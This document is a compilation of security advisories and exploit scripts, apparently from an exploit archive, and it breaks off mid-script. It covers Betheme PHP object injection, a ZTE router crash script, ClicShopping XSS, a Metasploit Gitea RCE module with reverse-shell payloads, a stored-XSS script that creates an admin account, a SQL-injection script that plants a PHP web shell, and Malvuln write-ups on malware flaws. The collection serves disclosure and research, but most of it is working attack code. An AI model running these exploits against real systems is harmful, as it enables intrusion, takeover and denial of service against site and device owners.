<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Betheme<br />Vendor URL: https://muffingroup.com/betheme/<br />Type: Deserialization of Untrusted Data [CWE-502]<br />Date found: 2022-11-02<br />Date published: 2022-11-18<br />CVSSv3 Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)<br />CVE: CVE-2022-3861<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />BeTheme 26.5.1.4 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Ever since Betheme was just an idea, we knew that it would be different from all<br />other multipurpose WordPress themes we’d tried before.<br /><br />We wanted to build something more than just another WordPress theme, that could<br />easily adapt to any project you need to work on without writing any code. A theme<br />designed from scratch to save your time & help you enjoy your freedom...<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress theme is vulnerable to multiple PHP Object injections when processing<br />input to multiple, privileged Wordpress ajax routes:<br /><br />-mfn_builder_import -> "mfn-items-import" parameter<br />-mfn_builder_import_page -> "mfn-items-import-page" parameter<br />-importdata -> "import" parameter<br />-importsinglepage -> "import" parameter<br />-importfromclipboard -> "import" parameter<br /><br />To successfully exploit this vulnerability, an attacker must be authenticated with at<br />least Wordpress "Contributer" rights.<br /><br />Successful exploits can allow the attacker to execute arbitrary code.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />To exploit the "mfn_builder_import" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 75<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=<br /><br /><br />To exploit the "mfn_builder_import_page" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 123<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/<br /><br /><br />To exploit the "importdata" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 114<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=<br /><br /><br />To exploit the "importsinglepage" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 83<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/<br /><br /><br />To exploit the "importfromclipboard" ajax action, use:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 123<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your-auth-cookies]<br />Connection: close<br /><br />mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=<br /><br /><br />7. SOLUTION<br />===========<br />Update to version 26.6<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-11-01: Discovery of the vulnerability<br />2022-11-03: CVE requested from Wordfence (CNA)<br />2022-11-04: Wordfence assigns CVE-2022-3861<br />2022-11-08: Vendor notification<br />2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond<br />2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability<br />2022-11-18: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/aef85cf0d521eaa6aade11f95ea07ebe.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Oblivion.01.a<br />Vulnerability: Insecure Transit Password Disclosure<br />Description: The malware listens on TCP port 7826 and makes HTTP GET requests to port 80 for "/scripts/WWPMsg.dll". The system logon credentials "Pass=beacytan" are sent plaintext via the URL query string. Third party attackers who can sniff traffic may locate the credentials which can also potentially be leaked to web server logs and or shared systems.<br /><br />Family: Oblivion<br />Type: PE32<br />MD5: aef85cf0d521eaa6aade11f95ea07ebe<br />Vuln ID: MVID-2022-0658<br />Disclosure: 11/18/2022<br /><br />Exploit/PoC:<br />tcpdump<br />GET /scripts/WWPMsg.dll?from=Oblivion&fromemail=Oblivion@Oblivion.com&subject=User+Online&body=Oblivion+Server+Online!!+[OS=Win]+[ComputerName=DESKTOP-2C4IQJO]+[IP=192.168.18.125]+[Port=7826]+[Pass=beacytan]+[Ver=0.1]&to=121768128 HTTP/1.0" 404 -<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)<br /># Date: 19-11-2022<br /># Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/<br /># Firmware: H108NSV1.0.7u_ZRD_GR2_A68<br /># Usage: python zte-exploit.py <victim-ip> <port><br /># CVE: N/A # Tested on: Debian 5.18.5<br /><br />#!/usr/bin/python3<br /><br /><br />import sys<br />import socket<br />from time import sleep<br /><br />host = sys.argv[1] # Recieve IP from user<br />port = int(sys.argv[2]) # Recieve Port from user<br /><br />junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"<br />* 5<br /><br /><br />buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"<br />+ junk + b"&TestBtn=START HTTP/1.1\r\n"<br />buffer += b"Host: 192.168.1.1\r\n"<br />buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)<br />Gecko/20100101 Firefox/91.0\r\n"<br />buffer += b"Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"<br />buffer += b"Accept-Language: en-US,en;q=0.5\r\n"<br />buffer += b"Accept-Encoding: gzip, deflate\r\n"<br />buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"<br />buffer += b"Connection: Keep-Alive\r\n"<br />buffer += b"Cookie:<br />SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;<br />_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"<br />buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"<br /><br /><br /><br /><br />print("[*] Sending evil payload...")<br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />s.connect((host, port))<br />s.send(buffer)<br />sleep(1)<br />s.close()<br />print("[+] Crashing boom boom ~ check if target is down ;)")<br /></code></pre>
<pre><code>## Title: ClicShopping_V3-Version3.402 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 11.20.2022<br />## Vendor: https://www.clicshopping.org/forum/<br />## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3<br /><br />## Description:<br />The name of an arbitrarily supplied URL parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks.<br />The attacker can trick users to open a very dangerous link or he can<br />get sensitive information, also he can destroy some components of your<br />system.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```js<br />GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/mgbftx)<br /><br />## Time spent<br />`1:00`<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/71a76adeadc7b51218d265771fc2b0d1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Platinum.gen<br />Vulnerability: Arbitrary Code Execution<br />Description: The malware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.<br />Family: PlatinumGroup<br />Type: PE32<br />MD5: 71a76adeadc7b51218d265771fc2b0d1<br />Vuln ID: MVID-2022-0657<br />Dropped files: Adobe_Update_Sync.exe<br />Disclosure: 11/18/2022 <br /><br /><br />Exploit/PoC:<br />1) Compile the following C code as "WTSAPI32.dll"<br />2) Place the DLL in same directory as the malware<br />3) Optional - Hide it: attrib +s +h "WTSAPI32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln - November 2022<br />//Purpose: PWN Platinum Group malware strain MD5: 71a76adeadc7b51218d265771fc2b0d1<br /><br />//gcc -c WTSAPI32.c -m32<br />//gcc -shared -o WTSAPI32.dll WTSAPI32.o -m32<br /><br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Platinum Group\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::Remote::HTTP::Gitea<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Gitea Git Fetch Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits Git fetch command in Gitea repository migration<br /> process that leads to a remote command execution on the system.<br /> This vulnerability affect Gitea before 1.16.7 version.<br /> },<br /> 'Author' => [<br /> 'wuhan005', # Original PoC<br /> 'li4n0', # Original PoC<br /> 'krastanoel' # MSF Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-30781'],<br /> ['URL', 'https://tttang.com/archive/1607/']<br /> ],<br /> 'DisclosureDate' => '2022-05-16',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[unix linux win],<br /> 'Arch' => ARCH_CMD,<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => %i[curl wget echo printf],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',<br /> 'CMDSTAGER::URIPATH' => '/payloads'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultOptions' => { 'WfsDelay' => 30 },<br /> 'DefaultTarget' => 1,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(3000),<br /> OptString.new('USERNAME', [true, 'Username to authenticate with']),<br /> OptString.new('PASSWORD', [true, 'Password to use']),<br /> OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),<br /> ])<br /> end<br /><br /> def cleanup<br /> super<br /> return if @uid.nil? || @migrate_repo_created.nil?<br /><br /> [@repo_name, @migrate_repo_name].each do |name|<br /> res = gitea_remove_repo(repo_path(name))<br /> if res.nil? || res&.code == 200<br /> vprint_warning("Unable to remove repository '#{name}'")<br /> elsif res&.code == 404<br /> vprint_warning("Repository '#{name}' not found, possibly already deleted")<br /> else<br /> vprint_status("Successfully cleanup repository '#{name}'")<br /> end<br /> end<br /> end<br /><br /> def check<br /> return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?<br /><br /> v = get_gitea_version<br /> gitea_login(datastore['username'], datastore['password'])<br /><br /> if Rex::Version.new(v) <= Rex::Version.new('1.16.6')<br /> return CheckCode::Appears("Version detected: #{v}")<br /> end<br /><br /> CheckCode::Safe("Version detected: #{v}")<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e<br /> return CheckCode::Unknown(e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e<br /> return CheckCode::Detected(e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,<br /> Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e<br /> return CheckCode::Safe(e.message)<br /> end<br /><br /> def primer<br /> [<br /> '/api/v1/version', '/api/v1/settings/api',<br /> "/api/v1/repos/#{@migrate_repo_path}",<br /> "/api/v1/repos/#{@migrate_repo_path}/pulls",<br /> "/api/v1/repos/#{@migrate_repo_path}/topics"<br /> ].each { |uri| hardcoded_uripath(uri) } # adding resources<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> if target['Type'] == :win_dropper<br /> # Git on Windows will pass the command to `sh.exe` and not `cmd`.<br /> # This requires some adjustments:<br /> # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR`<br /> # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`.<br /> # - Backslashes need to be escaped with `sh.exe`<br /> cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' }<br /> end<br /> vprint_status("Executing command: #{cmd}")<br /><br /> @repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_name = rand_text_alphanumeric(6..15)<br /> @migrate_repo_path = repo_path(@migrate_repo_name)<br /><br /> vprint_status("Creating repository \"#{@repo_name}\"")<br /> @uid = gitea_create_repo(@repo_name)<br /> vprint_good('Repository created')<br /> vprint_status('Migrating repository')<br /> clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"<br /> auth_token = rand_text_alphanumeric(6..15)<br /> @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)<br /> @p = cmd<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,<br /> Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,<br /> Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e<br /> fail_with(Failure::UnexpectedReply, e.message)<br /> end<br /><br /> def exploit<br /> unless datastore['AutoCheck']<br /> fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?<br /> gitea_login(datastore['username'], datastore['password'])<br /> end<br /><br /> start_service<br /> primer<br /><br /> case target['Type']<br /> when :unix_cmd, :win_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper, :win_dropper<br /> datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}"<br /> execute_cmdstager(background: true, delay: 1)<br /> end<br /> rescue Timeout::Error => e<br /> fail_with(Failure::TimeoutExpired, e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e<br /> fail_with(Failure::UnexpectedReply, e.message)<br /> rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e<br /> fail_with(Failure::NoAccess, e.message)<br /> end<br /><br /> def repo_path(name)<br /> "#{datastore['username']}/#{name}"<br /> end<br /><br /> def on_request_uri(cli, req)<br /> case req.uri<br /> when '/api/v1/version'<br /> send_response(cli, '{"version": "1.16.6"}')<br /> when '/api/v1/settings/api'<br /> data = {<br /> max_response_items: 50, default_paging_num: 30,<br /> default_git_trees_per_page: 1000, default_max_blob_size: 10485760<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}"<br /> data = {<br /> clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",<br /> owner: { login: datastore['username'] }<br /> }<br /> send_response(cli, data.to_json)<br /> when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"<br /> send_response(cli, '{"topics":[]}')<br /> when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"<br /> data = [<br /> {<br /> base: {<br /> ref: 'master'<br /> },<br /> head: {<br /> ref: "--upload-pack=#{@p}",<br /> repo: {<br /> clone_url: './',<br /> owner: { login: 'master' }<br /> }<br /> },<br /> updated_at: '2001-01-01T05:00:00+01:00',<br /> user: {}<br /> }<br /> ]<br /> send_response(cli, data.to_json)<br /> when datastore['CMDSTAGER::URIPATH']<br /> super<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS<br /># Exploit Author: Joe Pollock<br /># Date: November 16, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: T.B.C<br /># Vendor: Kapiya<br /># Version: 1.0<br /># Exploit Description:<br /># Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated <br /># client user to add an administrative user account to the application then log in as the newly created admin.<br /><br />To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).<br />The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the<br />'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will <br />be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should <br />now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the<br />'target', 'x_Username', and 'x_Passsword' as required).<br /><br /><script><br />var target = "http://localhost/rates/admin/usersadd.php";<br />var req = new XMLHttpRequest();<br />req.open("GET", target);<br />req.send();<br />var parser = new DOMParser();<br />resp = req.responseText<br />var document = parser.parseFromString(resp, "text/html");<br />var token = document.getElementsByName("token")[0].value;<br />var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";<br />req.open("POST", target);<br />req.withCredentials = true;<br />req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br />req.send(params);<br /></script><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection<br /># Exploit Author: Joe Pollock<br /># Date: November 16, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: T.B.C<br /># Vendor: Kapiya<br /># Version: 1.0<br /># Exploit Description:<br /># Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to <br /># write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.<br /># This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.<br /># Ex: python3 rcsv1.py 10.10.14.2 "ls"<br /><br />import sys, requests<br />def main():<br /> if len(sys.argv) != 3:<br /> print("(+) usage: %s <target> <cmd>" % sys.argv[0])<br /> print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0])<br /> sys.exit(-1)<br /><br /> targetIP = sys.argv[1]<br /> cmd = sys.argv[2]<br /> s = requests.Session()<br /> <br /> # Define obscure filename and command parameter to limit exposure and usage of the RCE.<br /> FILENAME = "youcantfindme.php"<br /> CMDVAR = "ohno"<br /> <br /> # Define the SQL injection string<br /> sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)<br /> <br /> # Write the PHP file to disk using the SQL injection vulnerability<br /> url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)<br /> r1 = s.get(url1)<br /> <br /> # Execute the user defined command and display the result<br /> url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)<br /> r2 = s.get(url2)<br /> print(r2.text)<br /> <br />if __name__ == '__main__':<br /> main()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/13ce53de9ca4c4e6c58f990b442cb419.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Quux<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Quux<br />Type: PE32<br />MD5: 13ce53de9ca4c4e6c58f990b442cb419<br />Vuln ID: MVID-2022-0656<br />Dropped files: quux32.exe<br />Disclosure: 11/15/2022<br />Description: The malware listens on TCP port 3. Authentication is required, however the password "Faraon" translated from Romanian as "Pharaoh" is weak and hardcoded in cleartext within the PE file. Third-party adversaries who can reach an infected host can call commands made available by the backdoor. Commands include uploading files and code execution. Theres a need to code a custom client to communicate with the infected host as nc64.exe and telnet send LF characters and will fail authentication when sending credentials containing "\n" etc. Once connected if we send any files they will be written to Windows\System unless calling the "SetCurrDir" commmand.<br /><br />0040AD24 ; char aFaraon[]<br />0040AD24 aFaraon db 'Faraon',0 ; DATA XREF _WinMain@16_0+376↑o<br />0040AD2B align 100h<br /><br />[Commands]<br />SetCurrDir<br />GetCurrDir<br />GetCurrentDirectory<br />Exec<br />GetFile<br />SendFile<br />quit<br />exit<br />shutdown<br />dir<br />CreateFile<br />DeleteFile<br />MessageBox<br />die<br /><br /><br />Exploit/PoC:<br />"quux32_xploit.py"<br /><br />from socket import *<br />import time, sys<br /><br />BANNER="""<br /> ____ ____ ___ ____ __ _ __ <br /> / __ \__ ____ ____ __ |_ /|_ | / __/_ __ ___ / /__ (_) /_<br />/ /_/ / // / // /\ \ /_/_ </ __/ / _/ \ \ // _ \/ / _ \/ / __/<br />\___\_\_,_/\_,_//_\_\/____/____/ /___//_\_\/ .__/_/\___/_/\__/ <br /> /_/ <br /> By Malvuln<br /> MVID-2022-0656 - Nov 2022<br />"""<br /><br />MALWARE_HOST=""<br />PORT=3<br />CREDZ="Faraon"<br /><br />def chk_res(s):<br /> res=""<br /> while True:<br /> res += s.recv(512).decode()<br /> if "#" in res or "\0" in res or "\n" in res or ":" in res:<br /> break<br /> return res<br /><br />def auth():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> #Authenticate<br /> s.send(CREDZ.encode())<br /> time.sleep(0.5)<br /> return s<br /><br />def upload(the_file):<br /> <br /> s = auth()<br /> <br /> PAYLOAD="GetCurrentDirectory"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /><br /> PAYLOAD="SetCurrDir"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /><br /> PAYLOAD="C:\\Users\\Public"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /> <br /> PAYLOAD="GetCurrentDirectory"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /><br /> PAYLOAD="SendFile"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> <br /> PAYLOAD=the_file<br /> 